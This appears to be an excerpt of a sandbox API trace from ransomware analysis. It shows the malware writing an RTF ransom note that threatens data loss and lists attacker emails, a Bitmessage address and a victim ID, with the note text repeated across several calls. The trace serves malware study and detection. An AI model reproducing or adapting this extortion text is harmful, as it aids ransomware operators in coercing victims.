link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.156] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.156] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x38afa38, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x123\x12è\x12u\x12 ", lpUsedDefaultChar=0x0) returned 8717 [0300.156] WriteFile (in: hFile=0x2d4, lpBuffer=0x38afa38*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x38afa38*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.157] CloseHandle (hObject=0x2d4) returned 1 [0300.157] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\logs\\common\\#readme_eman#.rtf")) returned 0xffffffff [0300.157] GetLastError () returned 0x2 [0300.157] CreateFileW 